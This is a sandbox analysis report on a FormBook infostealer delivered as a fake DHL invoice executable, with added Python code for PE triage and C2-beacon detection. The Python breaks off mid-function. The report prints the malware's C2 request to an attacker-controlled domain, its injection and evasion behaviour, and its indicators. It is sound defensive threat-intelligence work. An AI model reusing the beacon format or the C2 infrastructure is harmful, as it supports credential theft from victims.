          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook (the same Yara matches as listed under Stealing of Sensitive Information)

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules (1) | Path Interception | Process Injection (6, 1, 2) | Rootkit (1) | Credential API Hooking (1) | Security Software Discovery (2, 2, 1) | Remote Services | Credential API Hooking (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (1) | Security Account Manager | Virtualization/Sandbox Evasion (3, 1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion (3, 1) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (1, 2) | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection (6, 1, 2) | LSA Secrets | System Information Discovery (1, 1, 2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information (1) | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information (4) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing (1, 3) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion (1) | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |

          Behavior Graph

Behavior Graph ID: 532858
Sample: invoice dhl.delivery docume...
Start date: 02/12/2021
Architecture: WINDOWS
Score: 100
Signatures attached to the sample node: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 9 other signatures

Process tree recovered from the graph:
• invoice dhl.delivery document and original invoice sign.exe (started; badge: 3)
  • dropped file: invoice dhl.delive...nvoice sign.exe.log, ASCII
  • signature: Injects a PE file into a foreign processes
  • invoice dhl.delivery document and original invoice sign.exe (started)
    • signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe (injected)
      • DNS/IP: www.mimamincloor.com; www.federaldados.design; pixie.porkbun.com 44.227.76.166, 49792, 80 AMAZON-02US United States
      • signature: System process connects to network (likely due to code injection or exploit)
      • msdt.exe (started)
        • signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe (started; badge: 1)
          • conhost.exe (started)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
invoice dhl.delivery document and original invoice sign.exe | 29% | ReversingLabs | Win32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
www.cuteprofessionalscrubs.com/9gr5/ | 0% | Avira URL Cloud | safe
http://www.federaldados.design/9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== | 0% | Avira URL Cloud | safe
http://federaldados.design | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pixie.porkbun.com | 44.227.76.166 | true | false | | high
www.mimamincloor.com | unknown | unknown | true | | unknown
www.federaldados.design | unknown | unknown | true | | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.cuteprofessionalscrubs.com/9gr5/ | true | Avira URL Cloud: safe | low
http://www.federaldados.design/9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.397083667.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383799342.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425291445.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmp | false | | high
http://federaldados.design | msdt.exe, 0000000B.00000002.623782144.00000000052FF000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

                  Contacted IPs


                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
44.227.76.166 | pixie.porkbun.com | United States | 16509 | AMAZON-02US | false

                  General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532858
Start date: 02.12.2021
Start time: 18:56:21
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 8s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: invoice dhl.delivery document and original invoice sign.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@2/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 10.1% (good quality ratio 9%)
• Quality average: 69.7%
• Quality standard deviation: 32.8%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 92.122.145.220
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/532858/sample/invoice dhl.delivery document and original invoice sign.exe

                  Simulations

                  Behavior and APIs

Time | Type | Description
18:57:23 | API Interceptor | 1x Sleep call for process: invoice dhl.delivery document and original invoice sign.exe modified

                  Joe Sandbox View / Context




                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice dhl.delivery document and original invoice sign.exe.log
Process: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1310
Entropy (8bit): 5.345651901398759
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
MD5: D918C6A765EDB90D2A227FE23A3FEC98
SHA1: 8BA802AD8D740F114783F0DADC407CBFD2A209B3
SHA-256: AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
SHA-512: A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.790881583355775
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:invoice dhl.delivery document and original invoice sign.exe
                  File size:449536
                  MD5:ebce26da75669d94dbc0550bf394b204
                  SHA1:bcc8f769e51cd9f8a160e58840f80a008e2b72e2
                  SHA256:5fef546d71e9ed9f2e457bfd9aeb23a42a5074af37599c7fe4dcfeb8f687723c
                  SHA512:0e87adccb6d3ca4ea2ee2e101a20ea81437e3f774dd3296c264c92ce763adacacbe1a8a4b9b6226c0b8403569c716fd5fcc55820ea4a0575172d396bae432ed0
                  SSDEEP:12288:pY6XjcPK3hl0If0PufZptLKxO5J/jJUf7b3:LXjSKgIf8ufTtLPlqfP
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i..a................................. ........@.. .......................@............@................................

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x46f0be
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x61A89569 [Thu Dec 2 09:44:09 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v4.0.30319
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  (the remainder of the preview is zero padding, 00 00 ..., which the disassembler renders as repeated "add byte ptr [eax], al")

                  Data Directories

                  Name                                  Virtual Address  Virtual Size  Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x6f064          0x57          .text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x70000          0x4c0         .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x72000          0xc           .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                  Sections

                  Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                  .text   0x2000           0x6d0c4       0x6d200   False     0.883519473081   data       7.80084963355   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc   0x70000          0x4c0         0x600     False     0.37890625       data       4.67278801338   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc  0x72000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  Name         RVA      Size   Type                                                                                           Language  Country
                  RT_VERSION   0x700a0  0x26c  data
                  RT_MANIFEST  0x7030c  0x1b4  XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                  Imports

                  DLL          Import
                  mscoree.dll  _CorExeMain

                  Version Infos

                  Description       Data
                  Translation       0x0000 0x04b0
                  LegalCopyright
                  Assembly Version  0.0.0.0
                  InternalName      CMSFILEWRITABLETY.exe
                  FileVersion       0.0.0.0
                  ProductVersion    0.0.0.0
                  FileDescription
                  OriginalFilename  CMSFILEWRITABLETY.exe
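The Static PE Info tables above contain everything needed to sanity-check the sample's layout without re-parsing the file: the entry point `jmp dword ptr [00402000h]` dereferences the one IAT slot (RVA 0x2000, size 8), that slot is filled from the only import, mscoree.dll!_CorExeMain, and a COM descriptor (CLR header) is present, which is the standard native stub of a managed PE32 executable. The .text entropy of 7.80 and the OriginalFilename that does not match the name it was delivered under are the two static signals a triager would act on. The following is an added example (mine, not Joe Sandbox code) that encodes those checks as a small rule set over the table values; the entropy threshold, the finding texts and the "executable" flag per section are my own choices.

```python
"""Static-layout triage over the values printed in the Static PE Info tables.
Added example; constants are copied from the report, thresholds are mine."""
from dataclasses import dataclass
from typing import List, Optional

IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0x46f0be
ENTRY_JMP_SLOT_VA = 0x402000          # from "jmp dword ptr [00402000h]"
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}
ON_DISK_NAME = "invoice dhl.delivery document and original invoice sign.exe"
ORIGINAL_FILENAME = "CMSFILEWRITABLETY.exe"   # Version Infos / OriginalFilename
DIGITALLY_SIGNED = False


@dataclass(frozen=True)
class Section:
    name: str
    va: int            # RVA of the section start
    vsize: int
    raw_size: int
    entropy: float
    executable: bool   # derived from IMAGE_SCN_MEM_EXECUTE in the table


SECTIONS: List[Section] = [
    Section(".text",  0x2000,  0x6d0c4, 0x6d200, 7.80084963355,  True),
    Section(".rsrc",  0x70000, 0x4c0,   0x600,   4.67278801338,  False),
    Section(".reloc", 0x72000, 0xc,     0x200,   0.101910425663, False),
]

# name -> (RVA, size); the zero-sized directories from the table are omitted
DATA_DIRECTORIES = {
    "IMPORT":         (0x6f064, 0x57),
    "RESOURCE":       (0x70000, 0x4c0),
    "BASERELOC":      (0x72000, 0xc),
    "IAT":            (0x2000,  0x8),
    "COM_DESCRIPTOR": (0x2008,  0x48),
}


def section_for_rva(rva: int) -> Optional[Section]:
    """Map an RVA to the section whose virtual range contains it."""
    for s in SECTIONS:
        if s.va <= rva < s.va + s.vsize:
            return s
    return None


def section_for_va(va: int) -> Optional[Section]:
    return section_for_rva(va - IMAGE_BASE)


def is_clr_stub_entry() -> bool:
    """A managed EXE's native entry point is 'jmp [IAT slot]'; the slot holds
    mscoree!_CorExeMain and a COM descriptor (CLR header) is present."""
    iat_rva, iat_size = DATA_DIRECTORIES["IAT"]
    slot_rva = ENTRY_JMP_SLOT_VA - IMAGE_BASE
    in_iat = iat_rva <= slot_rva < iat_rva + iat_size
    has_clr_header = DATA_DIRECTORIES.get("COM_DESCRIPTOR", (0, 0))[1] > 0
    return in_iat and has_clr_header and "_CorExeMain" in IMPORTS.get("mscoree.dll", [])


def triage(entropy_threshold: float = 7.0) -> List[str]:
    """Return human-readable findings; the rule set and wording are mine."""
    findings = []
    ep = section_for_va(ENTRY_POINT_VA)
    if ep is None:
        findings.append("entry point outside every section")
    elif not ep.executable:
        findings.append("entry point in non-executable section %s" % ep.name)
    if is_clr_stub_entry():
        findings.append("managed (.NET) executable: entry point jumps through the IAT to mscoree!_CorExeMain")
    for s in SECTIONS:
        if s.entropy >= entropy_threshold:
            findings.append("%s entropy %.2f >= %.1f: packed or encrypted content" % (s.name, s.entropy, entropy_threshold))
        if s.vsize > s.raw_size:
            findings.append("%s virtual size exceeds raw size: space reserved for runtime unpacking" % s.name)
    for name, (rva, size) in DATA_DIRECTORIES.items():
        if size and section_for_rva(rva) is None:
            findings.append("data directory %s at RVA 0x%x lies outside every section" % (name, rva))
    if ORIGINAL_FILENAME.lower() != ON_DISK_NAME.lower():
        findings.append("OriginalFilename '%s' differs from the on-disk name" % ORIGINAL_FILENAME)
    if not DIGITALLY_SIGNED:
        findings.append("no Authenticode signature")
    return findings


if __name__ == "__main__":
    for finding in triage():
        print("-", finding)
```

For this sample the rule set yields four findings: the CLR stub, the high-entropy .text section (the encrypted FormBook payload the .NET loader unpacks at runtime), the OriginalFilename mismatch, and the missing signature. The raw-size and data-directory checks are there because they fire on hand-crafted PEs whose sections or directories were edited after linking; they are silent here.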

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Timestamp                           Source Port  Dest Port  Source IP      Dest IP
                  Dec 2, 2021 18:58:54.959861994 CET  49792        80         192.168.2.6    44.227.76.166
                  Dec 2, 2021 18:58:55.153683901 CET  80           49792      44.227.76.166  192.168.2.6
                  Dec 2, 2021 18:58:55.153938055 CET  49792        80         192.168.2.6    44.227.76.166
                  Dec 2, 2021 18:58:55.346704960 CET  80           49792      44.227.76.166  192.168.2.6
                  Dec 2, 2021 18:58:55.346857071 CET  49792        80         192.168.2.6    44.227.76.166
                  Dec 2, 2021 18:58:55.539767981 CET  80           49792      44.227.76.166  192.168.2.6
                  Dec 2, 2021 18:58:55.542661905 CET  80           49792      44.227.76.166  192.168.2.6
                  Dec 2, 2021 18:58:55.542689085 CET  80           49792      44.227.76.166  192.168.2.6
                  Dec 2, 2021 18:58:55.542970896 CET  49792        80         192.168.2.6    44.227.76.166
                  Dec 2, 2021 18:58:55.542995930 CET  49792        80         192.168.2.6    44.227.76.166
                  Dec 2, 2021 18:58:55.735187054 CET  80           49792      44.227.76.166  192.168.2.6

                  UDP Packets

                  Timestamp                           Source Port  Dest Port  Source IP    Dest IP
                  Dec 2, 2021 18:58:54.919909000 CET  50339        53         192.168.2.6  8.8.8.8
                  Dec 2, 2021 18:58:54.948086977 CET  53           50339      8.8.8.8      192.168.2.6
                  Dec 2, 2021 18:59:16.066459894 CET  63307        53         192.168.2.6  8.8.8.8
                  Dec 2, 2021 18:59:16.090806007 CET  53           63307      8.8.8.8      192.168.2.6

                  DNS Queries

                  Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class
                  Dec 2, 2021 18:58:54.919909000 CET  192.168.2.6  8.8.8.8  0x5c14    Standard query (0)  www.federaldados.design  A (IP address)  IN (0x0001)
                  Dec 2, 2021 18:59:16.066459894 CET  192.168.2.6  8.8.8.8  0xb04d    Standard query (0)  www.mimamincloor.com     A (IP address)  IN (0x0001)

                  DNS Answers

                  Timestamp                           Source IP  Dest IP      Trans ID  Reply Code      Name                     CName              Address        Type                    Class
                  Dec 2, 2021 18:58:54.948086977 CET  8.8.8.8    192.168.2.6  0x5c14    No error (0)    www.federaldados.design  pixie.porkbun.com                 CNAME (Canonical name)  IN (0x0001)
                  Dec 2, 2021 18:58:54.948086977 CET  8.8.8.8    192.168.2.6  0x5c14    No error (0)    pixie.porkbun.com                           44.227.76.166  A (IP address)          IN (0x0001)
                  Dec 2, 2021 18:58:54.948086977 CET  8.8.8.8    192.168.2.6  0x5c14    No error (0)    pixie.porkbun.com                           44.227.65.245  A (IP address)          IN (0x0001)
                  Dec 2, 2021 18:59:16.090806007 CET  8.8.8.8    192.168.2.6  0xb04d    Name error (3)  www.mimamincloor.com     none               none           A (IP address)          IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.federaldados.design

                  HTTP Packets

                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  0           192.168.2.6  49792        44.227.76.166   80                C:\Windows\explorer.exe

                  Timestamp                           kBytes transferred  Direction  Data
                  Dec 2, 2021 18:58:55.346857071 CET  11717               OUT        GET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1
                  Host: www.federaldados.design
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Dec 2, 2021 18:58:55.542661905 CET  11717               IN         HTTP/1.1 307 Temporary Redirect
                  Server: openresty
                  Date: Thu, 02 Dec 2021 17:58:55 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 168
                  Connection: close
                  Location: http://federaldados.design
                  X-Frame-Options: sameorigin
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>
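The one request in the capture is sent by explorer.exe (the process the payload was injected into), carries only a Host and a Connection header, and uses a single short path segment with a query of two short keys whose values look like base64. The server answered with a redirect to the apex domain, so this host did not behave as a live C2 during the run. As an added example, not a Joe Sandbox rule, the block below scores HTTP requests against that shape. The heuristic and its threshold are mine and derived from this one capture, so tune it against your own traffic before deploying; the request list is constructed, with the first entry reproducing the captured request and the other two as benign controls.

```python
"""Score HTTP requests for the beacon shape seen in the HTTP Packets table.
Added example; heuristic and sample requests are mine, except the first
request, which is the one captured in the report."""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

REQUESTS: List[Dict] = [
    {   # captured in the report: explorer.exe -> www.federaldados.design
        "process": r"C:\Windows\explorer.exe",
        "host": "www.federaldados.design",
        "target": "/9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ==",
        "headers": {"Host": "www.federaldados.design", "Connection": "close"},
    },
    {   # constructed benign browser request
        "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "host": "www.example.com",
        "target": "/search?q=dhl+tracking&hl=en",
        "headers": {"Host": "www.example.com", "User-Agent": "Mozilla/5.0", "Accept": "*/*"},
    },
    {   # constructed benign request from a system binary that does send a User-Agent
        "process": r"C:\Windows\System32\svchost.exe",
        "host": "www.msftconnecttest.com",
        "target": "/connecttest.txt",
        "headers": {"Host": "www.msftconnecttest.com", "User-Agent": "Microsoft NCSI"},
    },
]

PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")        # one short segment, trailing slash
KEY_RE = re.compile(r"^[A-Za-z0-9]{2,6}$")           # short alphanumeric parameter names
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")        # base64 alphabet with optional padding


def split_query(query: str) -> List[Tuple[str, str]]:
    """Split on '&' and on the first '=' only. urllib's parse_qsl would turn
    '+' into spaces and percent-decode, destroying the base64 shape we test."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def beacon_score(req: Dict) -> int:
    """One point per matching trait; 0..4."""
    parts = urlsplit(req["target"])
    score = 0
    if PATH_RE.match(parts.path):
        score += 1
    pairs = split_query(parts.query)
    if (len(pairs) == 2
            and all(KEY_RE.match(k) for k, _ in pairs)
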